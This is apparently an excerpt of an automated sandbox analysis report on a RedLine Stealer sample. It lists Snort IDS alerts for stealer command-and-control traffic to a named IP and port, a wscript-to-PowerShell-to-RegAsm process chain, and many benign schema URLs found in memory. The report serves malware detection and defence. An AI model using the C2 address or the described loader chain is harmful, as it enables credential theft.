Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49730 -> 5.42.92.179:18418
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49730 -> 5.42.92.179:18418
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 5.42.92.179:18418 -> 192.168.2.4:49730
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 5.42.92.179:18418 -> 192.168.2.4:49730
Source: Malware configuration extractor | URLs: 5.42.92.179:18418
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 5.42.92.179:18418
Source: Joe Sandbox View | ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: unknown | TCP traffic detected without corresponding DNS query: 5.42.92.179 (entry repeated 50 times in the report)
Source: powershell.exe, 00000005.00000002.1734103299.0000000007B9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: f6FauZ2CEz.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: powershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
